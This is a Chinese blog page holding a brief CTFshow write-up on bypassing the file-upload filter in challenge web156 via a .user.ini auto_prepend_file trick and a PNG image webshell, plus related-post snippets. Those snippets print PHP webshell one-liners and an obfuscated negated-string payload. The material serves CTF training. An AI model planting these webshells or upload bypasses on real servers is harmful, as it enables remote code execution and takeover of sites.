CTFshow 文件上传 web156

最新推荐文章于 2024-12-31 12:35:13 发布
最新推荐文章于 2024-12-31 12:35:13 发布
阅读量2.9k 收藏
点赞数
分类专栏: CTFshow 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Kracxi/article/details/122950774
版权
本文介绍了在CTF比赛中遇到的文件上传题CTFshow web156,通过分析发现系统对文件类型进行了检测,尝试使用图片马生成器PNG-IDAT-Payload-Generator来构造shell,但仍然被拦截。最终通过Burp Suite修改HTTP请求头绕过前端验证,成功上传了.user.ini文件。然后调整策略,绕过额外过滤,上传shell.png并在/upload路径下获取到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

思路

这次发现把shell.php改成png上传的时候,提示文件类型不合规,可能对文件头进行检测,可以利用图片马来写入shell.

https://github.com/huntergregal/PNG-IDAT-Payload-Generator

但是还是提示不合规,直接绕过前端验证,可以直接在burp里面改targethost的值,或者在本地发包
在这里插入图片描述
在这里插入图片描述
成功上传.user.ini

auto_prepend_file=shell.png

在上传shell.png,发现多过滤了一个[],不能传参了.

稍微改一下代码,访问/upload,拿到flag

最低0.47元/天 解锁文章
ctfshow文件上传
weixin_53955759的博客
04-15 863
web151 前台校验不可靠,前端验证 上传png,抓包改文件名为.php 成功,蚁剑连接得到falg web152 更改Content-Type即可 蚁剑连接,得到flag web153 利用上传user.ini进行文件上传绕过。 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样
CTFshow 文件上传 web163
Kradress的博客
02-16 744
目录源码思路总结 源码 思路 先上传.user.ini 上传成功 GIF89a auto_prepend_file=png 然后上传png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1?> 取反脚本 $a = "dat
ctfshow-web156(文件上传)
m0_62094846的博客
01-18 2476
这道题有点不好做,坑有些多 一、传入正常的png,jpg,gif文件都不行 png: jpg,gif和其他: png回显的不同证明应该要传入的文件类型是png 看了wp发现是文件内容过多,抓包,用bp减少png中的文件内容或者直接删除就能够上传成功 二、木马过滤的对象更多了 尝试各种短标签都无法上传成功,之前的题都是只过滤了木马语句中的php,但是这里还过滤了 [ ],因此要修改,可以改成{ } 也就是可以用 <?= eval($_POST{1});?> ...
ctfshow [web] 文件上传 156--160
weixin_68906365的博客
02-18 341
可以在User-Agent处写入php代码,在包含日志文件时就可以执行该代码。.user.ini 文件可以正常上传,可以先上传.user.ini 文件然后再上传写有木马的png图片,然后访问/upload页面。可以上传.user.ini文件,new.png也可以正常上传,操作和上题一样。过滤了空格,导致原 .user.ini 文件无法正常上传。可以上传 user.ini 文件,不过木马上传失败了。看了一眼题解,发现括号被过滤了,需要用反引号执行命令。短标签开启:(配置文件:php.ini)
ctfshow 文件上传
m0_64987233的博客
08-11 139
创建文件.user.ini.png,内容是auto_append_file="1.png"上传该png,抓包,改包(.user.ini.png改成.user.ini),send。放包,上传成功,访问/upload/index.php,POST传参即可RCE。条件:对应目录下面有可执行的php文件,如index.php。auto_prepend_file在木马文件上传前上传。auto_append_file在木马文件上传后上传。上传一句话木马1.png,抓包,send。
CTFshow 文件上传 web162
Kradress的博客
02-15 2284
目录思路总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
CTFshow 文件上传 web164
Kradress的博客
02-16 1117
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 多次尝试后,发现除了正常的png图片,都无法上传,猜测用图片马上传 https://github.com/huntergregal/PNG-IDAT-Payload-Generator 虽然上传成功,但把后缀改成任意字符串却被拦截,猜测是白名单 .user.ini也无法正常上传,应该有其他的点可以利用. 直接在网站上上传图片马后,发现显示查看图片 点击查看图片后,跳转到/download.php?imag
CTFshow 文件上传 Web151-170复现笔记(保姆级复现
2401_83728643的博客
12-31 1498
ctfshow文件上传复现保姆级笔记
CTFShow文件上传
paidx0
08-07 483
CTFShow文件上传 web151 前端直接抓包改就行 web152 同上 web153 利用上传.user.ini进行文件上传绕过 php.ini是php的一个全局配置文件,对整个web服务起作用; 而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini, 通常用这个文件来构造后门和隐藏后门。 **利用.user.ini,要求目标目录下必须包含php文件** .user.ini的内容为auto_append_file=1.png,意思就是使1
CTFshow-文件上传
qq_61376069的博客
01-22 623
CTFshow入门——文件上传
CTFSHOW 文件上传
qq_51754713的博客
02-27 433
开启文件上传 先补充一些知识 1.一句话木马 <?php @eval($_POST['attack']) ?> 只要一句话脚本上传到了服务器当中,我们就可以使用中国蚁剑或者中国菜刀链接并控制整个服务器。 2.中国蚁剑的使用 此处添加的url为我们一句话脚本所在的url,连接密码就是我们定义的_POST中的变量,如上面就是attack。 web152 解题思路:上传我们做好的含有一句话木马的图片,然后抓包修改发送包的类型为php,用蚁剑连接。 知识点: ①一句话木马的制作:我们使用Notepa
CTFSHOW 文件上传
m0_64180167的博客
11-14 414
直接上传 png的图片马然后抓包修改为php
CTFSHOW-文件上传
Monica的博客
10-03 3953
环境要求: allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件 WEB78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 分析:
CTFshow——文件上传
D.MIND 的博客
02-23 1553
目录:web151、152——前后端的简单检验web153——.user.ini配置文件web154、155——PHP的其他标记写法web156——{ }代替[ ]web157、158、159——web160—— web151、152——前后端的简单检验 发现只能上传PNG文件,上传一个图片马,用Burp抓包修改文件后缀  1.在upload/xx.php页面结合一句话木马  2.用蚁剑、菜刀连接 web153——.user.ini配置文件 细看:.htaccess和.user.ini配置文件妙用 如
ctfshow——文件上传
qq_55202378的博客
12-27 1684
之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
CTFshow_文件上传
qq_45927819的博客
11-29 3214
文章目录web151web152web153 web151 上传图片,经过测试只能上传后缀为png的图片 抓包改数据: 使用蚁剑连接: 找到flag! web152 做法和上题一样! web153 继续之前的操作,但并没有上传成功:
ctfshow web入门文件上传蚁剑连接
最新发布
01-02
### CTFShow Web 入门 文件上传 蚁剑 (AntSword) 连接教程 #### 准备工作 为了成功完成文件上传并利用蚁剑建立连接,需先准备环境。确保已安装蚁剑客户端,并准备好用于测试的恶意PHP脚本。 #### ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值